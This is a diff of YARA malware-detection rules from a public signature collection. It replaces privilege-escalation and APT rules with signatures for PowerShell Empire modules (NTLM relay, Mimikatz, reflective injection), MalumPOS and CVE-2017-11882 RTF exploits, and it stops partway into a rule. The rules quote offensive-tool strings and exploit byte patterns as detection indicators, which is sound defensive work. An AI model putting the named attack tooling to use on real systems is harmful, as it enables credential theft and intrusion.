+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Win_Privesc_Gp3Finder_V4_0 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Inveighrelay_Gen : FILE
 {
 	meta:
-		description = "Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe"
+		description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3b310c12-ac69-527b-9503-1486ae5f692c"
-		date = "2016-06-02"
+		id = "0adebf6f-99e1-5461-8efc-e4660faf6d5d"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "http://grimhacker.com/2015/04/10/gp3finder-group-policy-preference-password-finder/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_win_privesc.yar#L10-L26"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L469-L484"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d5618315ae5293ce1aea18d255d08bb007f39a466021fb636605684433da158"
-		score = 80
-		quality = 60
+		logic_hash = "183a0afa9233e380471ddfa8f85e6c6555d69c785c9a4e8791e19432b6849558"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7d34e214ef2ca33516875fb91a72d5798f89b9ea8964d3990f99863c79530c06"
+		super_rule = 1
+		hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
 
 	strings:
-		$x1 = "Check for and attempt to decrypt passwords on share" ascii
-		$x2 = "Failed to auto get and decrypt passwords. {0}s/" fullword ascii
-		$x3 = "GPPPFinder - Group Policy Preference Password Finder" fullword ascii
+		$s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii
+		$s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( all of them )
+		( uint16( 0 ) == 0x7566 and filesize < 200KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Win_Privesc_Folderperm
+rule SIGNATURE_BASE_Empire_Keepassconfig_Gen : FILE
 {
 	meta:
-		description = "Detects a tool that can be used for privilege escalation - file folderperm.ps1"
+		description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "131fdb57-f9ca-5247-8bb4-c939eff5b8bf"
-		date = "2016-06-02"
+		id = "e2bc88c5-50f8-5ddc-a449-41929b1d0528"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "http://www.greyhathacker.net/?p=738"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_win_privesc.yar#L28-L44"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L486-L500"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "899fda75e4c6d9f588767e5170dbd30241a492ba89f7cc1b0ad4adb2fcd173cb"
-		score = 80
+		logic_hash = "986f299d2b6e2ec47acae09d8a25b6c45caf83c964208c594433308cd11ad264"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1aa87df34826b1081c40bb4b702750587b32d717ea6df3c29715eb7fc04db755"
+		super_rule = 1
+		hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
 
 	strings:
-		$x1 = "# powershell.exe -executionpolicy bypass -file folderperm.ps1" fullword ascii
-		$x2 = "Write-Host \"[i] Dummy test file used to test access was not outputted:\" $filetocopy" fullword ascii
-		$x3 = "Write-Host -foregroundColor Red \"      Access denied :\" $myarray[$i] " fullword ascii
+		$s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Win_Privesc_Adaclscan4_3
+rule SIGNATURE_BASE_Empire_Invoke_Portscan_Gen : FILE
 {
 	meta:
-		description = "Detects a tool that can be used for privilege escalation - file ADACLScan4.3.ps1"
+		description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "15867a9c-9b9b-5d29-bf51-2b3e91af556f"
-		date = "2016-06-02"
+		id = "c2e01780-02d2-57d1-b38e-5c345ebccad6"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://adaclscan.codeplex.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_win_privesc.yar#L46-L62"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L502-L517"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ca657e5c4172d240f46a890fc112ee89d5bdf9e35e7d412332ee11bdaf166215"
-		score = 60
+		logic_hash = "05e786dc42ee5ec56197803577d104595ad6554e028b7633b2f7fdf55a63e27c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3473ddb452de7640fab03cad3e8aaf6a527bdd6a7a311909cfef9de0b4b78333"
+		super_rule = 1
+		hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
 
 	strings:
-		$s1 = "<Label x:Name=\"lblPort\" Content=\"Port:\"  HorizontalAlignment=\"Left\" Height=\"28\" Margin=\"10,0,0,0\" Width=\"35\"/>" fullword ascii
-		$s2 = "(([System.IconExtractor]::Extract(\"mmcndmgr.dll\", 126, $true)).ToBitMap()).Save($env:temp + \"\\Other.png\")    " fullword ascii
-		$s3 = "$bolValid = $ctx.ValidateCredentials($psCred.UserName,$psCred.GetNetworkCredential().Password)" fullword ascii
+		$s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii
+		$s2 = "1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x7566 and filesize < 100KB and 1 of them ) or all of them
 }
-
-rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_1 : FILE
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen4 : FILE
 {
 	meta:
-		description = "Detects strings found in malware samples in APT report in DarkHydrus"
+		description = "Detects Empire component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fbd001c0-43c9-5429-84d6-7f62eadd8ff3"
-		date = "2018-07-28"
+		id = "c390638a-0eb1-576d-a08c-203c31d414f3"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkhydrus.yar#L13-L29"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L519-L545"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2c39f2e6b37e6422984275f45a2917891c3b482d137dbbfd6293088c2f2dacc3"
+		logic_hash = "314574a463f9cc772702d5e3358f5280b2805298fedb89c14786518a4832d63b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c"
+		super_rule = 1
+		hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9"
+		hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+		hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
+		hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
+		hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+		hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
 
 	strings:
-		$x1 = "Z:\\devcenter\\aggressor\\" ascii
+		$s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" fullword ascii
+		$s2 = "# Get a handle to the module specified" fullword ascii
+		$s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" fullword ascii
+		$s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "d3666d1cde4790b22b44ec35976687fb" or 1 of them )
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_2 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Credentialinjection_Invoke_Mimikatz_Gen : FILE
 {
 	meta:
-		description = "Detects strings found in malware samples in APT report in DarkHydrus"
+		description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1a21cbbf-f7e1-56eb-973b-35c1a811e210"
-		date = "2018-07-28"
+		id = "d938aadf-6924-5964-9b5a-6bd1b817349f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkhydrus.yar#L31-L48"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L547-L563"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e967fec69ad1cbb46a63ee520594e7d6f2445a400510a9864dbd6d4c6e092737"
+		logic_hash = "3210b4407c3209a20d74c8c5af66077cc9b902912ae49253883b7acd87eef1f9"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b2571e3b4afbce56da8faa726b726eb465f2e5e5ed74cf3b172b5dd80460ad81"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
 
 	strings:
-		$s4 = "windir" fullword ascii
-		$s6 = "temp.dll" fullword ascii
-		$s7 = "libgcj-12.dll" fullword ascii
-		$s8 = "%s\\System32\\%s" fullword ascii
-		$s9 = "StartW" fullword ascii
+		$s1 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle" fullword ascii
+		$s2 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
 }
-
-rule SIGNATURE_BASE_APT_Darkhydrus_Jul18_3 : FILE
+rule SIGNATURE_BASE_Empire_Invoke_Gen : FILE
 {
 	meta:
-		description = "Detects strings found in malware samples in APT report in DarkHydrus"
+		description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1f766b49-3173-5f8a-ba52-a9ce9000be79"
-		date = "2018-07-28"
+		id = "913f971d-e4e3-55e9-904b-82b25a4e6f0f"
+		date = "2016-11-05"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkhydrus.yar#L50-L67"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L565-L582"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f3425322846e6064ec2576ad4e73061fbec3e4400de54d05fe07b8ad2a31f92"
+		logic_hash = "11d00ea1f40d34cfd3417db337a01eca39b0e77049f74f0c591cd1d388a8d194"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c8b3d4b6acce6b6655e17255ef7a214651b7fc4e43f9964df24556343393a1a3"
+		super_rule = 1
+		hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+		hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$s2 = "Ws2_32.dll" fullword ascii
-		$s3 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" fullword ascii
+		$s1 = "$Shellcode1 += 0x48" fullword ascii
+		$s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "478eacfbe2b201dabe63be53f34148a5" or all of them )
+		( uint16( 0 ) == 0x7566 and filesize < 3000KB and 1 of them ) or all of them
 }
-
-rule SIGNATURE_BASE_HKTL_Unlicensed_Cobaltstrike_EICAR_Jul18_5 : FILE
+rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen5 : FILE
 {
 	meta:
-		description = "Detects strings found in CobaltStrike shellcode"
+		description = "Detects Empire component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d52536b8-dd6b-59be-8761-d22b6a279114"
-		date = "2018-07-28"
-		modified = "2021-06-17"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_darkhydrus.yar#L69-L90"
+		id = "4c23592e-5788-5b84-995a-028142cbc52f"
+		date = "2016-11-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/adaptivethreat/Empire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L584-L601"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d066f22e01f9ca3a33c669552046a5ab8dd9e579236974b1c468ba9644498951"
+		logic_hash = "115fffabb09ed00ab46c6f980c3a7727070a303cafa900cc1ce04e3999b6b70e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cec36e8ed65ac6f250c05b4a17c09f58bb80c19b73169aaf40fa15c8d3a9a6a1"
+		super_rule = 1
+		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+		hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+		hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
 
 	strings:
-		$x1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
-		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
-		$s2 = "libgcj-12.dll" fullword ascii
+		$s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii
+		$s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "829da329ce140d873b4a8bde2cbfaa7e" or all of ( $s* ) or $x1 )
+		( uint16( 0 ) == 0x7566 and filesize < 1000KB and 1 of them ) or all of them
 }
-rule SIGNATURE_BASE_Crime_Win64_Backdoor_Bazarbackdoor1 : FILE
+rule SIGNATURE_BASE_Pos_Malware_Malumpos
 {
 	meta:
-		description = "Detects BazarBackdoor injected 64-bit malware"
-		author = "@VK_Intel"
-		id = "1e387791-97fa-527d-87ed-68872b1891c4"
-		date = "2020-04-24"
+		description = "Used to detect MalumPOS memory dumper"
+		author = "Trend Micro, Inc."
+		id = "6d85c7fe-bf1b-53fb-b618-4b0f8b63cae4"
+		date = "2015-05-25"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/pancak3lullz/status/1252303608747565057"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bazarbackdoor.yar#L1-L18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malumpos.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "becb6ebc3a1be061b4f602cc188b172f59bfb6342605af68d8b38009d589f57e"
+		logic_hash = "ece32e51a12adf0d68420c8d98efbe7df27b9061ddfe4dcedf151f9f06287eee"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		tlp = "white"
+		quality = 60
+		tags = ""
+		sample_filtype = "exe"
 
 	strings:
-		$str1 = "%id%"
-		$start = { 48 ?? ?? ?? ?? 57 48 83 ec 30 b9 01 00 00 00 e8 ?? ?? ?? ?? 84 c0 0f ?? ?? ?? ?? ?? 40 32 ff 40 ?? ?? ?? ?? e8 ?? ?? ?? ?? 8a d8 8b ?? ?? ?? ?? ?? 83 f9 01 0f ?? ?? ?? ?? ?? 85 c9 75 ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 85 c0 74 ?? b8 ff 00 00 00 e9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? eb ?? 40 b7 01 40 ?? ?? ?? ?? 8a cb e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 48 8b d8 48 ?? ?? ?? 74 ??}
-		$server = {40 53 48 83 ec 20 48 8b d9 e8 ?? ?? ?? ?? 85 c0 75 ?? 0f ?? ?? ?? ?? ?? ?? 66 83 f8 50 74 ?? b9 bb 01 00 00 66 3b c1 74 ?? a8 01 74 ?? 48 8b cb e8 ?? ?? ?? ?? 84 c0 75 ?? 48 8b cb e8 ?? ?? ?? ?? b8 f6 ff ff ff eb ?? 33 c0 48 83 c4 20 5b c3}
+		$string1 = "SOFTWARE\\Borland\\Delphi\\RTL"
+		$string2 = "B)[0-9]{13,19}\\"
+		$string3 = "[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\"
+		$string4 = "TRegExpr(exec): ExecNext Without Exec[Pos]"
+		$string5 = /Y:\\PROGRAMS\\.{20,300}\.pas/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		all of ( $string* )
 }
-rule SIGNATURE_BASE_Ce_Enfal_Cmstar_Debug_Msg : FILE
+rule SIGNATURE_BASE_Rtf_Cve2017_11882_Ole : MALICIOUS EXPLOIT CVE_2017_11882
 {
 	meta:
-		description = "Detects the static debug strings within CMSTAR"
-		author = "rfalcone"
-		id = "2c483f20-4fa8-5246-9dcb-8868db64b6e3"
-		date = "2015-05-10"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/JucrP9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cmstar.yar#L2-L20"
+		description = "Attempts to identify the exploit CVE 2017 11882"
+		author = "John Davison"
+		id = "b6c59cf1-52e4-5c9e-b3c3-d973d52736e3"
+		date = "2017-11-23"
+		modified = "2025-06-03"
+		reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9b9cc7e2a2481b0472721e6b87f1eba4faf2d419d1e2c115a91ab7e7e6fc7f7c"
-		logic_hash = "31251b7ce33eb561aeb7405514df83dc1e00fdf184e3deeaa48505407d9567a0"
-		score = 75
+		hash = "51cf2a6c0c1a29abca9fd13cb22421da"
+		logic_hash = "6856d3c78cc06899d2bc1f876dce6b718513ebad80f37d7b5914a14d1da5064c"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = "MALICIOUS, EXPLOIT, CVE_2017_11882"
 
 	strings:
-		$d1 = "EEE\x0d\x0a" fullword
-		$d2 = "TKE\x0d\x0a" fullword
-		$d3 = "VPE\x0d\x0a" fullword
-		$d4 = "VPS\x0d\x0a" fullword
-		$d5 = "WFSE\x0d\x0a" fullword
-		$d6 = "WFSS\x0d\x0a" fullword
-		$d7 = "CM**\x0d\x0a" fullword
+		$headers = { 1c 00 00 00 02 00 ?? ?? a9 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 01 01 03 ?? }
+		$font = { 0a 01 08 5a 5a }
+		$winexec = { 12 0c 43 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $d* )
+		all of them and @font > @headers and @winexec == @font + 5 + 44
 }
-rule SIGNATURE_BASE_VULN_PHP_Hack_Backdoored_Zlib_Zerodium_Mar21_1 : FILE
+rule SIGNATURE_BASE_Rtf_Cve2017_11882 : MALICIOUS EXPLOIT CVE_2017_1182
 {
 	meta:
-		description = "Detects backdoored PHP zlib version"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5e0ab8f8-776a-52b0-b5be-ff1d34bccfd1"
-		date = "2021-03-29"
-		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_php_zlib_backdoor.yar#L2-L15"
+		description = "Attempts to identify the exploit CVE 2017 11882"
+		author = "John Davison"
+		id = "b6c59cf1-52e4-5c9e-b3c3-d973d52736e3"
+		date = "2017-11-23"
+		modified = "2025-06-03"
+		reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L20-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "74bfd9e12cb7671cde953d361a2adeb9388edd9b2aab0f9ce04dce0d433561dc"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		hash = "51cf2a6c0c1a29abca9fd13cb22421da"
+		logic_hash = "37a65f086d393aae3dc88b3dd2520fff6e96b92fd6ae1be0a110f4eb826ae12d"
+		score = 60
+		quality = 81
+		tags = "MALICIOUS, EXPLOIT, CVE_2017_1182"
 
 	strings:
-		$x1 = "REMOVETHIS: sold to zerodium, mid 2017" fullword ascii
-		$x2 = "HTTP_USER_AGENTT" ascii fullword
+		$headers = { 31 63 30 30 30 30 30 30  30 32 30 30 ?? ?? ?? ??
+                     61 39 30 30 30 30 30 30  ?? ?? ?? ?? ?? ?? ?? ??
+                     ?? ?? ?? ?? ?? ?? ?? ??  ?? ?? ?? ?? ?? ?? ?? ??
+                     ?? ?? ?? ?? ?? ?? ?? ??  30 33 30 31 30 31 30 33
+                     ?? ?? }
+		$font = { 30 61 30 31 30 38 35 61  35 61 }
+		$winexec = { 31 32 30 63 34 33 30 30 }
 
 	condition:
-		filesize < 3000KB and all of them
+		all of them and @font > @headers and @winexec == @font + ( ( 5 + 44 ) * 2 )
 }
-rule SIGNATURE_BASE_EXPL_CVE_2021_40444_Document_Rels_XML : CVE_2021_40444 FILE
+rule SIGNATURE_BASE_Packager_Cve2017_11882 : CVE_2017_11882 FILE
 {
 	meta:
-		description = "Detects indicators found in weaponized documents that exploit CVE-2021-40444"
-		author = "Jeremy Brown / @alteredbytes"
-		id = "812bb68e-71ea-5a9a-8d39-ab99fdaa6c58"
-		date = "2021-09-10"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/AlteredBytes/status/1435811407249952772"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_40444.yar#L6-L25"
+		description = "Attempts to exploit CVE-2017-11882 using Packager"
+		author = "Rich Warren"
+		id = "57ff395e-e56a-5e63-bde6-f3cef038fcd6"
+		date = "2017-11-23"
+		modified = "2025-06-03"
+		reference = "https://github.com/rxwx/CVE-2017-11882/blob/master/packager_exec_CVE-2017-11882.py"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_11882.yar#L41-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b05c3b33c3cab2c9109d808ed197758bc987f07beee77e1f61094715e0c1a1e7"
-		score = 75
-		quality = 85
-		tags = "CVE-2021-40444, FILE"
+		logic_hash = "94e0c70e8140bb7fa3d184447617b534a8b9a24cdad535e6818be9662f0b9144"
+		score = 60
+		quality = 54
+		tags = "CVE-2017-11882, FILE"
 
 	strings:
-		$b1 = "/relationships/oleObject" ascii
-		$b2 = "/relationships/attachedTemplate" ascii
-		$c1 = "Target=\"mhtml:http" nocase
-		$c2 = "!x-usc:http" nocase
-		$c3 = "TargetMode=\"External\"" nocase
+		$font = { 30 61 30 31 30 38 35 61  35 61 }
+		$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
+		$package = { 50 61 63 6b 61 67 65 }
+		$header_and_shellcode = /03010[0,1][0-9a-fA-F]{108}00/ ascii nocase
 
 	condition:
-		uint32( 0 ) == 0x6D783F3C and filesize < 10KB and 1 of ( $b* ) and all of ( $c* )
+		uint32be( 0 ) == 0x7B5C7274 and all of them
 }
-rule SIGNATURE_BASE_EXPL_MAL_Maldoc_OBFUSCT_MHTML_Sep21_1 : CVE_2021_40444 FILE
+rule SIGNATURE_BASE_CVE_2017_11882_RTF : CVE_2017_11882 FILE
 {
